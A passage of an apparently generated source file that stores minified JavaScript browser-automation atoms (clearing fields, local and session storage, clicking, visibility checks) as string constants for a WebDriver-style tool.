"tFor)a=c.getBoxObjectFor(a),c=c.getBoxObjectFor(g),e.x=a.screenX-c.scre"\
"enX,e.y=a.screenY-c.screenY;else{var h=a;do{e.x+=h.offsetLeft;e.y+=h.of"\
"fsetTop;h!=a&&(e.x+=h.clientLeft||\n0,e.y+=h.clientTop||0);if(\"fixed\""\
"==P(h)){e.x+=c.body.scrollLeft;e.y+=c.body.scrollTop;break}h=h.offsetPa"\
"rent}while(h&&h!=a);\"absolute\"==d&&(e.y-=c.body.offsetTop);for(h=a;(h"\
"=Qa(h))&&h!=c.body&&h!=g;)e.x-=h.scrollLeft,e.y-=h.scrollTop}b=new y(e."\
"x-b.x,e.y-b.y)}return b}b=n(a.s);e=a;a.targetTouches?e=a.targetTouches["\
"0]:b&&a.s().targetTouches&&(e=a.s().targetTouches[0]);return new y(e.cl"\
"ientX,e.clientY)};function Q(a,b){return!!a&&1==a.nodeType&&(!b||a.tagN"\
"ame.toUpperCase()==b)}var Sa=\"BUTTON INPUT OPTGROUP OPTION SELECT TEXT"\
"AREA\".split(\" \");\nfunction Ta(a){var b=a.tagName.toUpperCase();retu"\
"rn q(Sa,b)?a.disabled?!1:a.parentNode&&1==a.parentNode.nodeType&&\"OPTG"\
"ROUP\"==b||\"OPTION\"==b?Ta(a.parentNode):!Aa(a,function(a){var b=a.par"\
"entNode;if(b&&Q(b,\"FIELDSET\")&&b.disabled){if(!Q(a,\"LEGEND\"))return"\
"!0;for(;a=void 0!=a.previousElementSibling?a.previousElementSibling:va("\
"a.previousSibling);)if(Q(a,\"LEGEND\"))return!0}return!1},!0):!0}var Ua"\
"=\"text search tel url email password number\".split(\" \");\nfunction "\
"Va(a){function b(a){return\"inherit\"==a.contentEditable?(a=R(a))?b(a):"\
"!1:\"true\"==a.contentEditable}return void 0!==a.contentEditable?void 0"\
"!==a.isContentEditable?a.isContentEditable:b(a):!1}function R(a){for(a="\
"a.parentNode;a&&1!=a.nodeType&&9!=a.nodeType&&11!=a.nodeType;)a=a.paren"\
"tNode;return Q(a)?a:null}\nfunction S(a,b){var c=da(b);if(\"float\"==c|"\
"|\"cssFloat\"==c||\"styleFloat\"==c)c=\"cssFloat\";c=Oa(a,c)||Wa(a,c);i"\
"f(null===c)c=null;else if(q(ja,b)&&(ma.test(\"#\"==c.charAt(0)?c:\"#\"+"\
"c)||qa(c).length||ia&&ia[c.toLowerCase()]||oa(c).length)){var d=oa(c);i"\
"f(!d.length){a:if(d=qa(c),!d.length){d=(d=ia[c.toLowerCase()])?d:\"#\"="\
"=c.charAt(0)?c:\"#\"+c;if(ma.test(d)&&(d=la(d),d=la(d),d=[parseInt(d.su"\
"bstr(1,2),16),parseInt(d.substr(3,2),16),parseInt(d.substr(5,2),16)],d."\
"length))break a;d=[]}3==d.length&&d.push(1)}c=4!=\nd.length?c:\"rgba(\""\
"+d.join(\", \")+\")\"}return c}function Wa(a,b){var c=a.currentStyle||a"\
".style,d=c[b];void 0===d&&n(c.getPropertyValue)&&(d=c.getPropertyValue("\
"b));return\"inherit\"!=d?void 0!==d?d:null:(c=R(a))?Wa(c,b):null}\nfunc"\
"tion Xa(a,b){function c(a){if(\"none\"==S(a,\"display\"))return!1;a=R(a"\
");return!a||c(a)}function d(a){var b=T(a);return 0<b.height&&0<b.width?"\
"!0:Q(a,\"PATH\")&&(0<b.height||0<b.width)?(a=S(a,\"stroke-width\"),!!a&"\
"&0<parseInt(a,10)):\"hidden\"!=S(a,\"overflow\")&&ga(a.childNodes,funct"\
"ion(a){return a.nodeType==ua||Q(a)&&d(a)})}function e(a){var b=S(a,\"-o"\
"-transform\")||S(a,\"-webkit-transform\")||S(a,\"-ms-transform\")||S(a,"\
"\"-moz-transform\")||S(a,\"transform\");if(b&&\"none\"!==b)return b=Ra("\
"a),a=T(a),0<=b.x+a.width&&\n0<=b.y+a.height?!0:!1;a=R(a);return!a||e(a)"\
"}if(!Q(a))throw Error(\"Argument to isShown must be of type Element\");"\
"if(Q(a,\"OPTION\")||Q(a,\"OPTGROUP\")){var g=Aa(a,function(a){return Q("\
"a,\"SELECT\")});return!!g&&Xa(g,!0)}return(g=Ya(a))?!!g.t&&0<g.rect.wid"\
"th&&0<g.rect.height&&Xa(g.t,b):Q(a,\"INPUT\")&&\"hidden\"==a.type.toLow"\
"erCase()||Q(a,\"NOSCRIPT\")||\"hidden\"==S(a,\"visibility\")||!c(a)||!b"\
"&&0==Za(a)||!d(a)||$a(a)==ab?!1:e(a)}var ab=\"hidden\";\nfunction $a(a)"\
"{function b(a){var b=a;if(\"visible\"==z)if(a==g)b=h;else if(a==h)retur"\
"n{x:\"visible\",y:\"visible\"};b={x:S(b,\"overflow-x\"),y:S(b,\"overflo"\
"w-y\")};a==g&&(b.x=\"hidden\"==b.x?\"hidden\":\"auto\",b.y=\"hidden\"=="\
"b.y?\"hidden\":\"auto\");return b}function c(a){var b=S(a,\"position\")"\
";if(\"fixed\"==b)return g;for(a=R(a);a&&a!=g&&(0==S(a,\"display\").last"\
"IndexOf(\"inline\",0)||\"absolute\"==b&&\"static\"==S(a,\"position\"));"\
")a=R(a);return a}var d=T(a),e=B(a),g=e.documentElement,h=e.body,z=S(g,"\
"\"overflow\");for(a=c(a);a;a=\nc(a)){var s=T(a),e=b(a),G=d.left>=s.left"\
"+s.width,s=d.top>=s.top+s.height;if(G&&\"hidden\"==e.x||s&&\"hidden\"=="\
"e.y)return ab;if(G&&\"visible\"!=e.x||s&&\"visible\"!=e.y)return $a(a)="\
"=ab?ab:\"scroll\"}return\"none\"}\nfunction T(a){var b=Ya(a);if(b)retur"\
"n b.rect;if(n(a.getBBox))try{var c=a.getBBox();return new O(c.x,c.y,c.w"\
"idth,c.height)}catch(d){throw d;}else{if(Q(a,\"HTML\"))return a=((B(a)?"\
"B(a).parentWindow||B(a).defaultView:window)||window).document,a=\"CSS1C"\
"ompat\"==a.compatMode?a.documentElement:a.body,a=new A(a.clientWidth,a."\
"clientHeight),new O(0,0,a.width,a.height);var b=Ra(a),c=a.offsetWidth,e"\
"=a.offsetHeight;c||(e||!a.getBoundingClientRect)||(a=a.getBoundingClien"\
"tRect(),c=a.right-a.left,e=a.bottom-a.top);\nreturn new O(b.x,b.y,c,e)}"\
"}function Ya(a){var b=Q(a,\"MAP\");if(!b&&!Q(a,\"AREA\"))return null;va"\
"r c=b?a:Q(a.parentNode,\"MAP\")?a.parentNode:null,d=null,e=null;if(c&&c"\
".name&&(d=N.M('/descendant::*[@usemap = \"#'+c.name+'\"]',B(c)))&&(e=T("\
"d),!b&&\"default\"!=a.shape.toLowerCase())){var g=bb(a);a=Math.min(Math"\
".max(g.left,0),e.width);b=Math.min(Math.max(g.top,0),e.height);c=Math.m"\
"in(g.width,e.width-a);g=Math.min(g.height,e.height-b);e=new O(a+e.left,"\
"b+e.top,c,g)}return{t:d,rect:e||new O(0,0,0,0)}}\nfunction bb(a){var b="\
"a.shape.toLowerCase();a=a.coords.split(\",\");if(\"rect\"==b&&4==a.leng"\
"th){var b=a[0],c=a[1];return new O(b,c,a[2]-b,a[3]-c)}if(\"circle\"==b&"\
"&3==a.length)return b=a[2],new O(a[0]-b,a[1]-b,2*b,2*b);if(\"poly\"==b&"\
"&2<a.length){for(var b=a[0],c=a[1],d=b,e=c,g=2;g+1<a.length;g+=2)b=Math"\
".min(b,a[g]),d=Math.max(d,a[g]),c=Math.min(c,a[g+1]),e=Math.max(e,a[g+1"\
"]);return new O(b,c,d-b,e-c)}return new O(0,0,0,0)}\nfunction Za(a){var"\
" b=1,c=S(a,\"opacity\");c&&(b=Number(c));(a=R(a))&&(b*=Za(a));return b}"\
";function cb(a,b){this.m=ca.document.documentElement;this.A=null;var c="\
"Ba(B(this.m));c&&db(this,c);this.V=a||new eb;this.O=b||new gb}function "\
"db(a,b){a.m=b;a.A=Q(b,\"OPTION\")?Aa(b,function(a){return Q(a,\"SELECT"\
"\")}):null}function eb(){this.ba=0}function gb(){};function hb(a,b,c){t"\
"his.B=a;this.D=b;this.F=c}hb.prototype.create=function(a){a=B(a).create"\
"Event(\"HTMLEvents\");a.initEvent(this.B,this.D,this.F);return a};hb.pr"\
"ototype.toString=f(\"B\");var ib=new hb(\"change\",!0,!1);function U(a,"\
"b){this.i={};this.e=[];var c=arguments.length;if(1<c){if(c%2)throw Erro"\
"r(\"Uneven number of arguments\");for(var d=0;d<c;d+=2)this.set(argumen"\
"ts[d],arguments[d+1])}else if(a){var e;if(a instanceof U)for(d=jb(a),kb"\
"(a),e=[],c=0;c<a.e.length;c++)e.push(a.i[a.e[c]]);else{var c=[],g=0;for"\
"(d in a)c[g++]=d;d=c;c=[];g=0;for(e in a)c[g++]=a[e];e=c}for(c=0;c<d.le"\
"ngth;c++)this.set(d[c],e[c])}}U.prototype.l=0;U.prototype.N=0;function "\
"jb(a){kb(a);return a.e.concat()}\nfunction kb(a){if(a.l!=a.e.length){fo"\
"r(var b=0,c=0;b<a.e.length;){var d=a.e[b];Object.prototype.hasOwnProper"\
"ty.call(a.i,d)&&(a.e[c++]=d);b++}a.e.length=c}if(a.l!=a.e.length){for(v"\
"ar e={},c=b=0;b<a.e.length;)d=a.e[b],Object.prototype.hasOwnProperty.ca"\
"ll(e,d)||(a.e[c++]=d,e[d]=1),b++;a.e.length=c}}U.prototype.get=function"\
"(a,b){return Object.prototype.hasOwnProperty.call(this.i,a)?this.i[a]:b"\
"};\nU.prototype.set=function(a,b){Object.prototype.hasOwnProperty.call("\
"this.i,a)||(this.l++,this.e.push(a),this.N++);this.i[a]=b};var lb={};fu"\
"nction V(a,b,c){var d=typeof a;(\"object\"==d&&null!=a||\"function\"==d"\
")&&(a=a.a);a=new mb(a,b,c);!b||b in lb&&!c||(lb[b]={key:a,shift:!1},c&&"\
"(lb[c]={key:a,shift:!0}));return a}function mb(a,b,c){this.code=a;this."\
"G=b||null;this.ca=c||this.G}V(8);V(9);V(13);var nb=V(16),ob=V(17),pb=V("\
"18);V(19);V(20);V(27);V(32,\" \");V(33);V(34);V(35);V(36);V(37);V(38);V"\
"(39);V(40);V(44);V(45);V(46);V(48,\"0\",\")\");V(49,\"1\",\"!\");V(50,"\
"\"2\",\"@\");V(51,\"3\",\"#\");V(52,\"4\",\"$\");V(53,\"5\",\"%\");V(54"\
",\"6\",\"^\");V(55,\"7\",\"&\");\nV(56,\"8\",\"*\");V(57,\"9\",\"(\");V"\
"(65,\"a\",\"A\");V(66,\"b\",\"B\");V(67,\"c\",\"C\");V(68,\"d\",\"D\");"\
"V(69,\"e\",\"E\");V(70,\"f\",\"F\");V(71,\"g\",\"G\");V(72,\"h\",\"H\")"\
";V(73,\"i\",\"I\");V(74,\"j\",\"J\");V(75,\"k\",\"K\");V(76,\"l\",\"L\""\
");V(77,\"m\",\"M\");V(78,\"n\",\"N\");V(79,\"o\",\"O\");V(80,\"p\",\"P"\
"\");V(81,\"q\",\"Q\");V(82,\"r\",\"R\");V(83,\"s\",\"S\");V(84,\"t\",\""\
"T\");V(85,\"u\",\"U\");V(86,\"v\",\"V\");V(87,\"w\",\"W\");V(88,\"x\","\
"\"X\");V(89,\"y\",\"Y\");V(90,\"z\",\"Z\");var qb=V(u?{b:91,a:91,opera:"\
"219}:t?{b:224,a:91,opera:17}:{b:0,a:91,opera:null});\nV(u?{b:92,a:92,op"\
"era:220}:t?{b:224,a:93,opera:17}:{b:0,a:92,opera:null});V(u?{b:93,a:93,"\
"opera:0}:t?{b:0,a:0,opera:16}:{b:93,a:null,opera:0});V({b:96,a:96,opera"\
":48},\"0\");V({b:97,a:97,opera:49},\"1\");V({b:98,a:98,opera:50},\"2\")"\
";V({b:99,a:99,opera:51},\"3\");V({b:100,a:100,opera:52},\"4\");V({b:101"\
",a:101,opera:53},\"5\");V({b:102,a:102,opera:54},\"6\");V({b:103,a:103,"\
"opera:55},\"7\");V({b:104,a:104,opera:56},\"8\");V({b:105,a:105,opera:5"\
"7},\"9\");V({b:106,a:106,opera:w?56:42},\"*\");V({b:107,a:107,opera:w?6"\
"1:43},\"+\");\nV({b:109,a:109,opera:w?109:45},\"-\");V({b:110,a:110,ope"\
"ra:w?190:78},\".\");V({b:111,a:111,opera:w?191:47},\"/\");V(144);V(112)"\
";V(113);V(114);V(115);V(116);V(117);V(118);V(119);V(120);V(121);V(122);"\
"V(123);V({b:107,a:187,opera:61},\"=\",\"+\");V(108,\",\");V({b:109,a:18"\
"9,opera:109},\"-\",\"_\");V(188,\",\",\"<\");V(190,\".\",\">\");V(191,"\
"\"/\",\"?\");V(192,\"`\",\"~\");V(219,\"[\",\"{\");V(220,\"\\\\\",\"|\""\
");V(221,\"]\",\"}\");V({b:59,a:186,opera:59},\";\",\":\");V(222,\"'\",'"\
"\"');var W=new U;W.set(1,nb);W.set(2,ob);W.set(4,pb);W.set(8,qb);\n(fun"\
"ction(a){var b=new U;p(jb(a),function(c){b.set(a.get(c).code,c)});retur"\
"n b})(W);function X(){cb.call(this)}ba(X,cb);X.J=function(){return X.u?"\
"X.u:X.u=new X};function rb(a){if(!Xa(a,!0)||!Ta(a)||\"none\"==S(a,\"poi"\
"nter-events\"))throw new r(12,\"Element is not currently interactable a"\
"nd may not be manipulated\");var b;(b=!(Q(a,\"TEXTAREA\")||(Q(a,\"INPUT"\
"\")?q(Ua,a.type.toLowerCase()):Va(a))))||(b=a.readOnly);if(b)throw new "\
"r(12,\"Element must be user-editable in order to clear it.\");b=X.J();d"\
"b(b,a);b=b.A||b.m;var c=Ba(B(b));if(b!=c){if(c&&n(c.blur)&&!Q(c,\"BODY"\
"\"))try{c.blur()}catch(d){throw d;}n(b.focus)&&b.focus()}a.value&&(a.va"\
"lue=\"\",b=ib.create(a,void 0),\"isTrusted\"in\nb||(b.isTrusted=!1),a.d"\
"ispatchEvent(b));Va(a)&&(a.innerHTML=\" \")}var Y=[\"_\"],Z=l;Y[0]in Z|"\
"|!Z.execScript||Z.execScript(\"var \"+Y[0]);for(var $;Y.length&&($=Y.sh"\
"ift());)Y.length||void 0===rb?Z=Z[$]?Z[$]:Z[$]={}:Z[$]=rb;; return this"\
"._.apply(null,arguments);}.apply({navigator:typeof window!=undefined?wi"\
"ndow.navigator:null,document:typeof window!=undefined?window.document:n"\
"ull}, arguments);}"
CLEAR_LOCAL_STORAGE = \
"function(){return function(){var c=window;function d(a,g){this.code=a;t"\
"his.state=e[a]||f;this.message=g||\"\";var b=this.state.replace(/((?:^|"\
"\\s+)[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/"\
"g,\"\")}),l=b.length-5;if(0>l||b.indexOf(\"Error\",l)!=l)b+=\"Error\";t"\
"his.name=b;b=Error(this.message);b.name=this.name;this.stack=b.stack||"\
"\"\"}(function(){var a=Error;function g(){}g.prototype=a.prototype;d.b="\
"a.prototype;d.prototype=new g})();\nvar f=\"unknown error\",e={15:\"ele"\
"ment not selectable\",11:\"element not visible\",31:\"ime engine activa"\
"tion failed\",30:\"ime not available\",24:\"invalid cookie domain\",29:"\
"\"invalid element coordinates\",12:\"invalid element state\",32:\"inval"\
"id selector\",51:\"invalid selector\",52:\"invalid selector\",17:\"java"\
"script error\",405:\"unsupported operation\",34:\"move target out of bo"\
"unds\",27:\"no such alert\",7:\"no such element\",8:\"no such frame\",2"\
"3:\"no such window\",28:\"script timeout\",33:\"session not created\",1"\
"0:\"stale element reference\",\n0:\"success\",21:\"timeout\",25:\"unabl"\
"e to set cookie\",26:\"unexpected alert open\"};e[13]=f;e[9]=\"unknown "\
"command\";d.prototype.toString=function(){return this.name+\": \"+this."\
"message};var h=this.navigator;var k=-1!=(h&&h.platform||\"\").indexOf("\
"\"Win\")&&!1;\nfunction m(){var a=c||c;switch(\"local_storage\"){case "\
"\"appcache\":return null!=a.applicationCache;case \"browser_connection"\
"\":return null!=a.navigator&&null!=a.navigator.onLine;case \"database\""\
":return null!=a.openDatabase;case \"location\":return k?!1:null!=a.navi"\
"gator&&null!=a.navigator.geolocation;case \"local_storage\":return null"\
"!=a.localStorage;case \"session_storage\":return null!=a.sessionStorage"\
"&&null!=a.sessionStorage.clear;default:throw new d(13,\"Unsupported API"\
" identifier provided as parameter\");}}\n;function n(a){this.a=a}n.prot"\
"otype.clear=function(){this.a.clear()};function p(){if(!m())throw new d"\
"(13,\"Local storage undefined\");(new n(c.localStorage)).clear()}var q="\
"[\"_\"],r=this;q[0]in r||!r.execScript||r.execScript(\"var \"+q[0]);for"\
"(var s;q.length&&(s=q.shift());)q.length||void 0===p?r=r[s]?r[s]:r[s]={"\
"}:r[s]=p;; return this._.apply(null,arguments);}.apply({navigator:typeo"\
"f window!=undefined?window.navigator:null,document:typeof window!=undef"\
"ined?window.document:null}, arguments);}"
CLEAR_SESSION_STORAGE = \
"function(){return function(){var c=window;function d(a,g){this.code=a;t"\
"his.state=e[a]||f;this.message=g||\"\";var b=this.state.replace(/((?:^|"\
"\\s+)[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/"\
"g,\"\")}),l=b.length-5;if(0>l||b.indexOf(\"Error\",l)!=l)b+=\"Error\";t"\
"his.name=b;b=Error(this.message);b.name=this.name;this.stack=b.stack||"\
"\"\"}(function(){var a=Error;function g(){}g.prototype=a.prototype;d.b="\
"a.prototype;d.prototype=new g})();\nvar f=\"unknown error\",e={15:\"ele"\
"ment not selectable\",11:\"element not visible\",31:\"ime engine activa"\
"tion failed\",30:\"ime not available\",24:\"invalid cookie domain\",29:"\
"\"invalid element coordinates\",12:\"invalid element state\",32:\"inval"\
"id selector\",51:\"invalid selector\",52:\"invalid selector\",17:\"java"\
"script error\",405:\"unsupported operation\",34:\"move target out of bo"\
"unds\",27:\"no such alert\",7:\"no such element\",8:\"no such frame\",2"\
"3:\"no such window\",28:\"script timeout\",33:\"session not created\",1"\
"0:\"stale element reference\",\n0:\"success\",21:\"timeout\",25:\"unabl"\
"e to set cookie\",26:\"unexpected alert open\"};e[13]=f;e[9]=\"unknown "\
"command\";d.prototype.toString=function(){return this.name+\": \"+this."\
"message};var h=this.navigator;var k=-1!=(h&&h.platform||\"\").indexOf("\
"\"Win\")&&!1;\nfunction m(){var a=c||c;switch(\"session_storage\"){case"\
" \"appcache\":return null!=a.applicationCache;case \"browser_connection"\
"\":return null!=a.navigator&&null!=a.navigator.onLine;case \"database\""\
":return null!=a.openDatabase;case \"location\":return k?!1:null!=a.navi"\
"gator&&null!=a.navigator.geolocation;case \"local_storage\":return null"\
"!=a.localStorage;case \"session_storage\":return null!=a.sessionStorage"\
"&&null!=a.sessionStorage.clear;default:throw new d(13,\"Unsupported API"\
" identifier provided as parameter\");}}\n;function n(a){this.a=a}n.prot"\
"otype.clear=function(){this.a.clear()};function p(){var a;if(m())a=new "\
"n(c.sessionStorage);else throw new d(13,\"Session storage undefined\");"\
"a.clear()}var q=[\"_\"],r=this;q[0]in r||!r.execScript||r.execScript(\""\
"var \"+q[0]);for(var s;q.length&&(s=q.shift());)q.length||void 0===p?r="\
"r[s]?r[s]:r[s]={}:r[s]=p;; return this._.apply(null,arguments);}.apply("\
"{navigator:typeof window!=undefined?window.navigator:null,document:type"\
"of window!=undefined?window.document:null}, arguments);}"
CLICK = \
"function(){return function(){function g(a){return function(){return thi"\
"s[a]}}function aa(a){return function(){return a}}var k=this;\nfunction "\
"ba(a){var b=typeof a;if(\"object\"==b)if(a){if(a instanceof Array)retur"\
"n\"array\";if(a instanceof Object)return b;var c=Object.prototype.toStr"\
"ing.call(a);if(\"[object Window]\"==c)return\"object\";if(\"[object Arr"\
"ay]\"==c||\"number\"==typeof a.length&&\"undefined\"!=typeof a.splice&&"\
"\"undefined\"!=typeof a.propertyIsEnumerable&&!a.propertyIsEnumerable("\
"\"splice\"))return\"array\";if(\"[object Function]\"==c||\"undefined\"!"\
"=typeof a.call&&\"undefined\"!=typeof a.propertyIsEnumerable&&!a.proper"\
"tyIsEnumerable(\"call\"))return\"function\"}else return\"null\";\nelse "\
"if(\"function\"==b&&\"undefined\"==typeof a.call)return\"object\";retur"\
"n b}function l(a){return\"string\"==typeof a}function m(a){return\"func"\
"tion\"==ba(a)}function ca(a,b){function c(){}c.prototype=b.prototype;a."\
"ja=b.prototype;a.prototype=new c};var da=window;function ea(a){return S"\
"tring(a).replace(/\\-([a-z])/g,function(a,c){return c.toUpperCase()})};"\
"var fa=Array.prototype;function n(a,b){for(var c=a.length,d=l(a)?a.spli"\
"t(\"\"):a,e=0;e<c;e++)e in d&&b.call(void 0,d[e],e,a)}function ga(a,b){"\
"if(a.reduce)return a.reduce(b,\"\");var c=\"\";n(a,function(d,e){c=b.ca"\
"ll(void 0,c,d,e,a)});return c}function ha(a,b){for(var c=a.length,d=l(a"\
")?a.split(\"\"):a,e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a))return"\
"!0;return!1}\nfunction ia(a,b){var c;a:if(l(a))c=l(b)&&1==b.length?a.in"\
"dexOf(b,0):-1;else{for(c=0;c<a.length;c++)if(c in a&&a[c]===b)break a;c"\
"=-1}return 0<=c}function ja(a,b,c){return 2>=arguments.length?fa.slice."\
"call(a,b):fa.slice.call(a,b,c)};var ka={aliceblue:\"#f0f8ff\",antiquewh"\
"ite:\"#faebd7\",aqua:\"#00ffff\",aquamarine:\"#7fffd4\",azure:\"#f0ffff"\
"\",beige:\"#f5f5dc\",bisque:\"#ffe4c4\",black:\"#000000\",blanchedalmon"\
"d:\"#ffebcd\",blue:\"#0000ff\",blueviolet:\"#8a2be2\",brown:\"#a52a2a\""\
",burlywood:\"#deb887\",cadetblue:\"#5f9ea0\",chartreuse:\"#7fff00\",cho"\
"colate:\"#d2691e\",coral:\"#ff7f50\",cornflowerblue:\"#6495ed\",cornsil"\
"k:\"#fff8dc\",crimson:\"#dc143c\",cyan:\"#00ffff\",darkblue:\"#00008b\""\
",darkcyan:\"#008b8b\",darkgoldenrod:\"#b8860b\",darkgray:\"#a9a9a9\",da"\
"rkgreen:\"#006400\",\ndarkgrey:\"#a9a9a9\",darkkhaki:\"#bdb76b\",darkma"\
"genta:\"#8b008b\",darkolivegreen:\"#556b2f\",darkorange:\"#ff8c00\",dar"\
"korchid:\"#9932cc\",darkred:\"#8b0000\",darksalmon:\"#e9967a\",darkseag"\
"reen:\"#8fbc8f\",darkslateblue:\"#483d8b\",darkslategray:\"#2f4f4f\",da"\
"rkslategrey:\"#2f4f4f\",darkturquoise:\"#00ced1\",darkviolet:\"#9400d3"\
"\",deeppink:\"#ff1493\",deepskyblue:\"#00bfff\",dimgray:\"#696969\",dim"\
"grey:\"#696969\",dodgerblue:\"#1e90ff\",firebrick:\"#b22222\",floralwhi"\
"te:\"#fffaf0\",forestgreen:\"#228b22\",fuchsia:\"#ff00ff\",gainsboro:\""\
"#dcdcdc\",\nghostwhite:\"#f8f8ff\",gold:\"#ffd700\",goldenrod:\"#daa520"\
"\",gray:\"#808080\",green:\"#008000\",greenyellow:\"#adff2f\",grey:\"#8"\
"08080\",honeydew:\"#f0fff0\",hotpink:\"#ff69b4\",indianred:\"#cd5c5c\","\
"indigo:\"#4b0082\",ivory:\"#fffff0\",khaki:\"#f0e68c\",lavender:\"#e6e6"\
"fa\",lavenderblush:\"#fff0f5\",lawngreen:\"#7cfc00\",lemonchiffon:\"#ff"\
"facd\",lightblue:\"#add8e6\",lightcoral:\"#f08080\",lightcyan:\"#e0ffff"\
"\",lightgoldenrodyellow:\"#fafad2\",lightgray:\"#d3d3d3\",lightgreen:\""\
"#90ee90\",lightgrey:\"#d3d3d3\",lightpink:\"#ffb6c1\",lightsalmon:\"#ff"\
"a07a\",\nlightseagreen:\"#20b2aa\",lightskyblue:\"#87cefa\",lightslateg"\
"ray:\"#778899\",lightslategrey:\"#778899\",lightsteelblue:\"#b0c4de\",l"\
"ightyellow:\"#ffffe0\",lime:\"#00ff00\",limegreen:\"#32cd32\",linen:\"#"\
"faf0e6\",magenta:\"#ff00ff\",maroon:\"#800000\",mediumaquamarine:\"#66c"\
"daa\",mediumblue:\"#0000cd\",mediumorchid:\"#ba55d3\",mediumpurple:\"#9"\
"370db\",mediumseagreen:\"#3cb371\",mediumslateblue:\"#7b68ee\",mediumsp"\
"ringgreen:\"#00fa9a\",mediumturquoise:\"#48d1cc\",mediumvioletred:\"#c7"\
"1585\",midnightblue:\"#191970\",mintcream:\"#f5fffa\",mistyrose:\"#ffe4"\
"e1\",\nmoccasin:\"#ffe4b5\",navajowhite:\"#ffdead\",navy:\"#000080\",ol"\
"dlace:\"#fdf5e6\",olive:\"#808000\",olivedrab:\"#6b8e23\",orange:\"#ffa"\
"500\",orangered:\"#ff4500\",orchid:\"#da70d6\",palegoldenrod:\"#eee8aa"\
"\",palegreen:\"#98fb98\",paleturquoise:\"#afeeee\",palevioletred:\"#db7"\
"093\",papayawhip:\"#ffefd5\",peachpuff:\"#ffdab9\",peru:\"#cd853f\",pin"\
"k:\"#ffc0cb\",plum:\"#dda0dd\",powderblue:\"#b0e0e6\",purple:\"#800080"\
"\",red:\"#ff0000\",rosybrown:\"#bc8f8f\",royalblue:\"#4169e1\",saddlebr"\
"own:\"#8b4513\",salmon:\"#fa8072\",sandybrown:\"#f4a460\",seagreen:\"#2"\
"e8b57\",\nseashell:\"#fff5ee\",sienna:\"#a0522d\",silver:\"#c0c0c0\",sk"\
"yblue:\"#87ceeb\",slateblue:\"#6a5acd\",slategray:\"#708090\",slategrey"\
":\"#708090\",snow:\"#fffafa\",springgreen:\"#00ff7f\",steelblue:\"#4682"\
"b4\",tan:\"#d2b48c\",teal:\"#008080\",thistle:\"#d8bfd8\",tomato:\"#ff6"\
"347\",turquoise:\"#40e0d0\",violet:\"#ee82ee\",wheat:\"#f5deb3\",white:"\
"\"#ffffff\",whitesmoke:\"#f5f5f5\",yellow:\"#ffff00\",yellowgreen:\"#9a"\
"cd32\"};var la=\"background-color border-top-color border-right-color b"\
"order-bottom-color border-left-color color outline-color\".split(\" \")"\
",ma=/#([0-9a-fA-F])([0-9a-fA-F])([0-9a-fA-F])/;function na(a){if(!oa.te"\
"st(a))throw Error(\"'\"+a+\"' is not a valid hex color\");4==a.length&&"\
"(a=a.replace(ma,\"#$1$1$2$2$3$3\"));return a.toLowerCase()}var oa=/^#(?"\
":[0-9a-f]{3}){1,2}$/i,pa=/^(?:rgba)?\\((\\d{1,3}),\\s?(\\d{1,3}),\\s?("\
"\\d{1,3}),\\s?(0|1|0\\.\\d*)\\)$/i;\nfunction qa(a){var b=a.match(pa);i"\
"f(b){a=Number(b[1]);var c=Number(b[2]),d=Number(b[3]),b=Number(b[4]);if"\
"(0<=a&&255>=a&&0<=c&&255>=c&&0<=d&&255>=d&&0<=b&&1>=b)return[a,c,d,b]}r"\
"eturn[]}var ra=/^(?:rgb)?\\((0|[1-9]\\d{0,2}),\\s?(0|[1-9]\\d{0,2}),\\s"\
"?(0|[1-9]\\d{0,2})\\)$/i;function sa(a){var b=a.match(ra);if(b){a=Numbe"\
"r(b[1]);var c=Number(b[2]),b=Number(b[3]);if(0<=a&&255>=a&&0<=c&&255>=c"\
"&&0<=b&&255>=b)return[a,c,b]}return[]};function r(a,b){this.code=a;this"\
".state=ta[a]||ua;this.message=b||\"\";var c=this.state.replace(/((?:^|"\
"\\s+)[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/"\
"g,\"\")}),d=c.length-5;if(0>d||c.indexOf(\"Error\",d)!=d)c+=\"Error\";t"\
"his.name=c;c=Error(this.message);c.name=this.name;this.stack=c.stack||"\
"\"\"}ca(r,Error);\nvar ua=\"unknown error\",ta={15:\"element not select"\
"able\",11:\"element not visible\",31:\"ime engine activation failed\",3"\
"0:\"ime not available\",24:\"invalid cookie domain\",29:\"invalid eleme"\
"nt coordinates\",12:\"invalid element state\",32:\"invalid selector\",5"\
"1:\"invalid selector\",52:\"invalid selector\",17:\"javascript error\","\
"405:\"unsupported operation\",34:\"move target out of bounds\",27:\"no "\
"such alert\",7:\"no such element\",8:\"no such frame\",23:\"no such win"\
"dow\",28:\"script timeout\",33:\"session not created\",10:\"stale eleme"\
"nt reference\",\n0:\"success\",21:\"timeout\",25:\"unable to set cookie"\
"\",26:\"unexpected alert open\"};ta[13]=ua;ta[9]=\"unknown command\";r."\
"prototype.toString=function(){return this.name+\": \"+this.message};var"\
" va,wa,xa,ya=k.navigator;xa=ya&&ya.platform||\"\";va=-1!=xa.indexOf(\"M"\
"ac\");wa=-1!=xa.indexOf(\"Win\");var s=-1!=xa.indexOf(\"Linux\");var za"\
";function t(a,b){this.x=void 0!==a?a:0;this.y=void 0!==b?b:0}t.prototyp"\
"e.toString=function(){return\"(\"+this.x+\", \"+this.y+\")\"};t.prototy"\
"pe.ceil=function(){this.x=Math.ceil(this.x);this.y=Math.ceil(this.y);re"\
"turn this};t.prototype.floor=function(){this.x=Math.floor(this.x);this."\
"y=Math.floor(this.y);return this};t.prototype.round=function(){this.x=M"\
"ath.round(this.x);this.y=Math.round(this.y);return this};function u(a,b"\
"){this.width=a;this.height=b}u.prototype.toString=function(){return\"("\
"\"+this.width+\" x \"+this.height+\")\"};u.prototype.ceil=function(){th"\
"is.width=Math.ceil(this.width);this.height=Math.ceil(this.height);retur"\
"n this};u.prototype.floor=function(){this.width=Math.floor(this.width);"\
"this.height=Math.floor(this.height);return this};u.prototype.round=func"\
"tion(){this.width=Math.round(this.width);this.height=Math.round(this.he"\
"ight);return this};var Ba=3;function Ca(a){for(;a&&1!=a.nodeType;)a=a.p"\
"reviousSibling;return a}function Da(a,b){if(a.contains&&1==b.nodeType)r"\
"eturn a==b||a.contains(b);if(\"undefined\"!=typeof a.compareDocumentPos"\
"ition)return a==b||Boolean(a.compareDocumentPosition(b)&16);for(;b&&a!="\
